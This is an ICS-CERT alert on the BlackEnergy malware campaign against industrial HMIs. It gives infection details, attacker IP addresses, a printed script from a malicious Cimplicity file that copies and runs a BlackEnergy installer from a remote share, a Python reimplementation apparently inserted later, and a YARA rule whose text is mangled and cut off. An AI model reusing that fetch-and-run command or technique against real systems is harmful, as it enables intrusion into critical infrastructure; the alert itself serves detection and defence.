# Alert (ICS-ALERT-14-281-01C)

## Ongoing Sophisticated Malware Campaign Compromising ICS (Update C)

**Original release date: December 10, 2014 | Last revised: January 26, 2016**

##### Legal Notice

All information products included in [http://ics-cert.us-cert.gov](http://ics-cert.us-cert.gov) are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see [http://www.us-cert.gov/tlp/](http://www.us-cert.gov/tlp/).

#### SUMMARY

This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01B Ongoing Sophisticated Malware Campaign Compromising ICS that was published December 10, 2014, on the ICS-CERT web site.

ICS-CERT has identified a sophisticated malware campaign that has compromised numerous industrial control system (ICS) environments using a variant of the BlackEnergy malware. Analysis indicates that this campaign has been ongoing since at least 2011. Multiple companies working with ICS-CERT have identified the malware on Internet-connected human-machine interfaces (HMIs).

##### --------- Begin Update C Part 1 of 2 -------

Recent open-source reports have circulated alleging that a December 23, 2015, power outage in Ukraine was caused by BlackEnergy Malware.
ICS-CERT and US-CERT are working with the Ukrainian CERT and our international partners to analyze the malware and can confirm that a BlackEnergy 3 variant was present in the system. Based on the technical artifacts ICS-CERT and US-CERT have been provided, we cannot confirm a causal link between the power outage and the presence of the malware. However, we continue to support CERT-UA on this issue. The YARA signature included with the original posting of this alert has been shown to identify a majority of the samples seen as of this update and continues to be the best method for detecting BlackEnergy infections.

While there are many open source reports of BE3, this is the first opportunity ICS-CERT has been able to provide results of malware analysis. In a departure from the ICS product vulnerabilities used to deliver the BE2 malware, in this case the infection vector appears to have been spear phishing via a malicious Microsoft Office (MS Word) attachment. ICS-CERT and US-CERT analysis and support are ongoing, and additional technical analysis will be made available on the US-CERT Secure Portal.

##### --------- End Update C Part 1 of 2 -------

ICS-CERT originally published information and technical indicators about this campaign in a [TLP Amber](https://www.us-cert.gov/tlp/) alert (ICS-ALERT-14-281-01P) that was released to the US-CERT secure portal on October 8, 2014, and updated on December 10, 2014. US critical infrastructure asset owners and operators can request access to this information by emailing [ics-cert@hq.dhs.gov](mailto:ics-cert@hq.dhs.gov).

#### DETAILS

ICS-CERT has determined that users of HMI products from various vendors have been targeted in this campaign, including GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. It is currently unknown whether other vendors' products have also been targeted.
ICS-CERT is working with the involved vendors to evaluate this activity and also notify their users of the linkages to this campaign.

At this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim systems' control processes. ICS-CERT has not been able to verify if the intruders expanded access beyond the compromised HMI into the remainder of the underlying control system. However, typical malware deployments have included modules that search out any network-connected file shares and removable media for additional lateral movement within the affected environment. The malware is highly modular and not all functionality is deployed to all victims.

In addition, public reports reference a BlackEnergy-based campaign against a variety of overseas targets leveraging vulnerability CVE-2014-4114 (affecting Microsoft Windows and Windows Server 2008 and 2012). ICS-CERT has not observed the use of this vulnerability to target control system environments. However, analysis of the technical findings in the two reports shows linkages in the shared command and control infrastructure between the campaigns, suggesting both are part of a broader campaign by the same threat actor.

ICS-CERT strongly encourages asset owners and operators to look for signs of compromise within their control systems environments. Any positive or suspected findings should be immediately reported to ICS-CERT for further analysis and correlation.

-----

direct connection to the Internet. Analysis of victim system artifacts has determined that the actors have been exploiting a vulnerability in GE's Cimplicity HMI product since at least January 2012. The vulnerability, [CVE-2014-0751](http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0751), was published in ICS-CERT advisory [ICSA-14-023-01](https://ics-cert.us-cert.gov/advisories/ICSA-14-023-01) on January 23, 2014. Guidance for remediation was published to the GE IP portal in December 2013. GE has also released a statement about this campaign on the GE security web site.

Using this vulnerability, attackers were able to have the HMI server execute a malicious .cim file [Cimplicity screen file] hosted on an attacker-controlled server.

| Date | Request Type | Requestor IP | Screen Served |
|---|---|---|---|
| 1/17/2012 7:16 | Start | | //212.124.110.146/testshare/payload.cim |
| 9/9/2013 1:49 | Start | | //46.165.250.32/incoming/devlist.cim |
| 9/10/2014 3:59 | Start | | \\94.185.85.122\public\config.bak |

Figure 1. Log entries showing execution of remote .cim file.

ICS-CERT has analyzed two different .cim files used in this campaign: devlist.cim and config.bak. Both files use scripts to ultimately install the BlackEnergy malware.

**devlist.cim:** This file uses an embedded script that is executed as soon as the file is opened using the Screen Open event. The obfuscated script downloads the file "newsfeed.xml" from the same remote server, which it saves in the Cimplicity directory using the name <41 character string>.wsf. The name is randomly generated using upper and lower case letters, numbers, and hyphens. The .wsf script is then executed using the Windows command-based script host (cscript.exe). The new script downloads the file "category.xml," which it saves in the Cimplicity directory using the name "CimWrapPNPS.exe." CimWrapPNPS.exe is a BlackEnergy installer that deletes itself once the malware is installed.

**config.bak:** This file uses a script that is executed when the file is opened using the OnOpenExecCommand event. The script downloads a BlackEnergy installer from a remote server, names it "CimCMSafegs.exe," copies it into the Cimplicity directory, and then executes it.
The CimCMSafegs.exe file is a BlackEnergy installer that deletes itself after the malware is installed.

```
cmd.exe /c "copy \\94[dot]185[dot]85[dot]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH"\CimCMSafegs.exe"
```

Figure 2. Script executed by malicious config.bak file.

Analysis suggests that the actors likely used automated tools to discover and compromise vulnerable systems. ICS-CERT is concerned that any companies that have been running Cimplicity since 2012 with their HMI directly connected to the Internet could be infected with BlackEnergy malware. ICS-CERT strongly recommends that companies use the indicators and Yara signature in this alert to check their systems. In addition, we recommend that all Cimplicity users review ICS-CERT advisory [ICSA-14-023-01](https://ics-cert.us-cert.gov/advisories/ICSA-14-023-01) and apply the recommended mitigations.

##### WINCC

While ICS-CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy, there are indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have been exploited by the BlackEnergy malware. ICS-CERT strongly encourages users of WinCC, TIA Portal, and PCS7 to update their software to the most recent version as soon as possible. Please see Siemens Security Advisory [SSA-134508](http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-134508.pdf) and ICS-CERT advisory [ICSA-14-329-02D](https://ics-cert.us-cert.gov/advisories/ICSA-14-329-02D) for additional details.

##### ADVANTECH/BROADWIN WEBACCESS

A number of the victims associated with this campaign were running the Advantech/BroadWin WebAccess software with a direct Internet connection.
We have not yet identified the initial infection vector for victims running this platform but believe it is being targeted.

#### DETECTION

##### YARA SIGNATURE

##### --------- Begin Update C Part 2 of 2 -------

ICS-CERT has published instructions for how to use the YARA signature in typical information technology environments. ICS-CERT recommends a phased approach to using this YARA signature in an industrial control systems (ICSs) environment. Test the use of the signature in the test/quality assurance/development ICS environment if one exists. If not, deploy the signature against backup or alternate systems in the top end of the ICS environment; this signature will not be usable on the majority of field devices.

##### --------- End Update C Part 2 of 2 -------

ICS-CERT has produced a Yara signature to aid in identifying if the malware files are present on a given system. This signature is provided "as is" and has not been fully tested for all variations or environments. Any positive or suspected findings should be immediately reported to ICS-CERT for further analysis and correlation. The Yara signature is available at:

/sites/default/files/file_attach/ICS-ALERT-14-281-01.yara

YARA is a pattern-matching tool used by computer security researchers and companies to help identify malware. You can find usage help and download links on the main Yara page at [http://plusvic.github.io/yara/](http://plusvic.github.io/yara/).
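
The BlackEnergy2 rule reproduced further down this page gates its `$b` resource patterns on PE header arithmetic: `uint16(0) == 0x5A4D`, `uint32(uint32(0x3C)) == 0x4550`, the TimeDateStamp at `e_lfanew+8`, and a section-table walk that only accepts a `$b` match whose offset lies in the last section's raw data. The Python below is an added illustration, not part of the ICS-CERT signature or its tooling: it reimplements those checks on a constructed minimal PE32 image so the condition can be read and exercised outside YARA. `VERSION_MARKER` (the UTF-16LE "VS_VERSION_INFO" prefix shared by the `$b` patterns), the helper names and the two-section test image are assumptions of the example, and it generalises the rule's hard-coded 248-byte section-table offset by reading `SizeOfOptionalHeader`.

```python
import struct

# UTF-16LE "VS_VERSION_INFO": the bytes every $b pattern in the rule opens with
# (56 00 53 00 5F 00 ...). Used here as a short stand-in for those long patterns.
VERSION_MARKER = "VS_VERSION_INFO".encode("utf-16-le")
# The rule's $a strings, matched 'wide nocase' (UTF-16LE, case-insensitive).
A_STRINGS = ["Adobe Flash Player Installer", "regedt32.exe",
             "WindowsSysUtility", "USB MDM Driver"]


def _e_lfanew(data: bytes) -> int:
    """uint32(0x3C): file offset of the 'PE\\0\\0' signature."""
    return struct.unpack_from("<I", data, 0x3C)[0]


def is_pe(data: bytes) -> bool:
    """uint16(0) == 0x5A4D ('MZ') and uint32(uint32(0x3C)) == 0x00004550 ('PE\\0\\0')."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe = _e_lfanew(data)
    return len(data) >= pe + 24 and data[pe:pe + 4] == b"PE\x00\x00"


def timestamp_is_zero(data: bytes) -> bool:
    """uint32(uint32(0x3C)+8) == 0: the COFF TimeDateStamp was zeroed."""
    return struct.unpack_from("<I", data, _e_lfanew(data) + 8)[0] == 0


def last_section_raw_range(data: bytes):
    """(start, end) file offsets of the last section's raw data.

    The rule hard-codes the section table at e_lfanew + 248 (4-byte signature +
    20-byte COFF header + 224-byte PE32 optional header). This version reads
    SizeOfOptionalHeader at e_lfanew + 20 instead, which yields 248 for PE32 and
    the right offset for PE32+ as well (a generalisation of the rule, assumed here).
    """
    pe = _e_lfanew(data)
    nsections = struct.unpack_from("<H", data, pe + 6)[0]    # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]    # SizeOfOptionalHeader
    if nsections == 0:
        return 0, 0
    last = pe + 24 + opt_size + 40 * (nsections - 1)         # last 40-byte header
    raw_size = struct.unpack_from("<I", data, last + 16)[0]  # SizeOfRawData
    raw_ptr = struct.unpack_from("<I", data, last + 20)[0]   # PointerToRawData
    return raw_ptr, raw_ptr + raw_size


def pattern_in_last_section(data: bytes, pattern: bytes) -> bool:
    """'$ in (start..end)': some occurrence of pattern starts inside the last section."""
    start, end = last_section_raw_range(data)
    off = data.find(pattern)
    while off != -1:
        if start <= off <= end:
            return True
        off = data.find(pattern, off + 1)
    return False


def has_wide_nocase(data: bytes, s: str) -> bool:
    """YARA 'wide nocase' for an ASCII string: UTF-16LE with ASCII case folded."""
    return s.lower().encode("utf-16-le") in data.lower()


def blackenergy2_shape(data: bytes, resource_patterns=(VERSION_MARKER,)) -> bool:
    """The rule's condition, with resource_patterns standing in for the $b byte strings."""
    if not is_pe(data):
        return False
    a_hit = any(has_wide_nocase(data, s) for s in A_STRINGS)
    b_hit = any(pattern_in_last_section(data, p) for p in resource_patterns)
    return (a_hit and timestamp_is_zero(data)) or b_hit


def build_test_pe(timestamp: int = 0x54E1F000, text_blob: bytes = b"",
                  rsrc_blob: bytes = b"") -> bytes:
    """Constructed minimal two-section PE32 image (not a real sample) for exercising
    the checks: .text at file offset 0x200, .rsrc (the last section) at 0x400."""
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 2, timestamp, 0, 0, 224, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\x00" * 222                # PE32 magic, 224 bytes

    def section(name, vaddr, raw_ptr, raw_size):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        return struct.pack("<8sIIIIIIHHI", name, raw_size, vaddr, raw_size,
                           raw_ptr, 0, 0, 0, 0, 0x60000020)

    headers = (dos + b"PE\x00\x00" + coff + optional
               + section(b".text", 0x1000, 0x200, 0x200)
               + section(b".rsrc", 0x2000, 0x400, 0x200)).ljust(0x200, b"\x00")
    text = (b"\x90" * 16 + text_blob).ljust(0x200, b"\x00")
    rsrc = (b"\x00" * 64 + rsrc_blob).ljust(0x200, b"\x00")
    return headers + text + rsrc
```

The same marker placed in `.text` instead of the last section does not satisfy the rule, which is why the `$b` clause resists simple string matches elsewhere in a file.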

For use on a Windows machine, you can download the precompiled binaries at:

Yara version 3.1.0 32-bit

| File | MD5 | SHA256 |
|---|---|---|
| yara32.exe | fddd3831d7026c81cbd189ac567421ab | 865992534620d38b988df10a79a39bb12519f44aee8a56233a58cfb54a48c895 |
| yarac32.exe | 87273afb970743c7eee001a3ec6a71cd | 94ece384cded7e35ca8d600deeea7d59776098f4e459ddab5a94b1f470e59174 |

Yara version 3.1.0 64-bit

| File | MD5 | SHA256 |
|---|---|---|
| yara64.exe | 105c05f8d789e85c36dd845b5fbb323e | 77c657dacac4d737c3791d284ea8c750ff7fffe88d47397e049586a1980710be |
| yarac64.exe | c9b79b1a4cf4fb9a31391a1c15bed6d6 | 7bfcbafc1b814be1ec337fd653289c073913140325685119445afa471e65eb94 |

Once downloaded, extract the zip archive to the computer where you need to run the signatures and copy the ICS-CERT Yara rule into the same folder. For a comprehensive search (which will take a number of hours, depending on the system), use the following command:

```
yara32.exe -r -s ICS-ALERT-14-281-01.yara C: >> yara_results.txt
```

For a quicker search, use the following:

(for Windows Vista and later)

```
yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Windows >> yara_results.txt
yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Users >> yara_results.txt
```

(for Windows XP or earlier)

```
yara32.exe -r -s ICS-ALERT-14-281-01.yara C:\Windows >> yara_results.txt
yara32.exe -r -s ICS-ALERT-14-281-01.yara "C:\Documents and Settings" >> yara_results.txt
```

These commands will create a text file named "yara_results.txt" in the same folder as the rule and Yara executable. If the
If the** **search returns hits, you can send this file to ICS-CERT, and ICS-CERT will verify if your system is compromised by** **BlackEnergy.** **//ICS-CERT BlackEnergy Yara rules from ICS-ALERT-14-281-01** **rule BlackEnergy2** **//ICS-CERT rule to BlackEnergy2 versions 5.0.0 through 7.1.2 (full) and versions 10.0.0 through 11.1.0 (light)** **//version 3** **{** **strings:** **$a1 = "Adobe Flash Player Installer" wide nocase** **$a3 = "regedt32.exe" wide nocase** **$a4 = "WindowsSysUtility" wide nocase** **$a6 = "USB MDM Driver" wide nocase** **$b1 = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 3F 00 00 00** **00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00 00 01 00 53 00 74 00 72 00 69 00** **6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00** **34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00** ----- **2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00** **61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00** **68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01 00 4F 00 72 00 69 00** **67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73 00 62 00 6D 00 64 00** **6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00** **6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69 00 6E 00 64 00 6F 00** **77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00** **00 00 00 00 40 00 0E 00 01 00 50 00 72 00 
6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00** **00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 1C 02 00 00 01 00 30 00** **34 00 30 00 39 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00** **61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00** **6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00** **72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 55 00 53 00 42 00 20 00 4D 00 44 00 4D 00 20 00 44 00 72 00** **69 00 76 00 65 00 72 00 00 00 00 00 3C 00 0E 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00** **6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 4A 00 13 00** **01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00** **79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 31 00 33 00 00 00 00 00 3E 00 0B 00 01** **00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 75 00 73** **00 62 00 6D 00 64 00 6D 00 2E 00 73 00 79 00 73 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00 64 00 75 00 63** **00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 57 00 69** **00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73** **00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73** **00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 48** **00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 28 00 08 00 00 00 54** **00 72 00 61 00 6E 00 73 00 6C 00 
61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 15 00 B0 04 09 04 B0 04}** **$b2 = {34 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 03 00 03 00 04 00 02 00 03 00 03 00 04 00 02 00 3F 00 00 00** **00 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 02 00 00 00 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 70 02 00 00 00 00 30 00 34 00 30 00 39 00 30 00 34** **00 65 00 34 00 00 00 4A 00 15 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 53 00 6F 00 6C 00 69 00 64 00 20 00 53 00 74 00 61 00 74 00 65 00 20 00 4E 00 65 00 74 00 77 00 6F 00 72 00 6B** **00 73 00 00 00 00 00 62 00 1D 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61** **00 79 00 65 00 72 00 20 00 49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 30 00 08 00 01 00 46** **00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34** **00 00 00 32 00 09 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 68 00 6F** **00 73 00 74 00 2E 00 65 00 78 00 65 00 00 00 00 00 76 00 29 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70** **00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 20 00 28 00 43 00** **29 00 20 00 41 00 64 00 6F 00 62 00 65 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 73 00 20 00 49 00 6E 00 63 00** **6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 65 00 64 00 00 00 00 00 3A 00 09 00 01 00 4F 00 72 00 69 00 67 00 69 00** **6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 68 00 6F 00 73 00 74 00 2E 00 65 00 78 00** **65 00 00 00 00 00 5A 00 1D 00 01 00 50 00 72 00 6F 
00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00** **41 00 64 00 6F 00 62 00 65 00 20 00 46 00 6C 00 61 00 73 00 68 00 20 00 50 00 6C 00 61 00 79 00 65 00 72 00 20 00** **49 00 6E 00 73 00 74 00 61 00 6C 00 6C 00 65 00 72 00 00 00 00 00 34 00 08 00 01 00 50 00 72 00 6F 00 64 00 75 00** **63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 33 00 2E 00 33 00 2E 00 32 00 2E 00 34 00 00 00 44 00** **00 00 00 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00** **72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04 46 45 32 58}** **$b3 = {C8 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 17 00 00 00** **00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 01 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 04 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34** **00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69** **00 6F 00 6E 00 00 00 48 00 10 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 49 00 44 00 45 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 72 00 69 00 76 00 65 00 72** **00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E** **00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30** **00 38 00 30 00 34 00 31 00 33 00 2D 00 30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67** **00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 
43 00 6F 00 70 00 79 00 72 00 69 00 67** **00 68 00 74 00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 39 00 00 00 00 00 66 00 23 00 01 00 50 00 72 00 6F 00** **64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00** **20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 20 00 4F 00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00** **53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00** **65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00** **32 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00** **04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04}** **$b4 = {9C 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 06 00 01 40 B0 1D 01 00 06 00 01 40 B0 1D 3F 00 00 00** **00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 02 00 00 01 00 53 00 74 00 72 00 69 00 6E** **00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 D6 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34** **00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00** **00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69** **00 6F 00 6E 00 00 00 58 00 18 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69** **00 6F 00 6E 00 00 00 00 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6F 00 72** **00 20 00 55 00 74 00 69 00 6C 00 69 00 74 00 79 00 00 00 6C 00 26 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72** **00 73 00 69 00 6F 00 6E 00 00 00 00 00 36 00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 
00 31 00 36 00 33 00 38** **00 35 00 20 00 28 00 77 00 69 00 6E 00 37 00 5F 00 72 00 74 00 6D 00 2E 00 30 00 39 00 30 00 37 00 31 00 33 00 2D** **00 31 00 32 00 35 00 35 00 29 00 00 00 3A 00 0D 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61** **00 6D 00 65 00 00 00 72 00 65 00 67 00 65 00 64 00 74 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00 00 80 00 2E** **00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D** **00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F** ----- **00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F** **00 70 00 65 00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 42 00 0F** **00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 36 00 2E 00 31** **00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00** **46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00** **61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}** **$b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00** **4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A 44 B1 1D 3F 00 00 00** **00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02 00 00 01 00 53 00 74 00 72 00 69 00** **6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00** **34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00** **00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00** **69 00 6F 00 6E 00 00 00 4E 00 13 
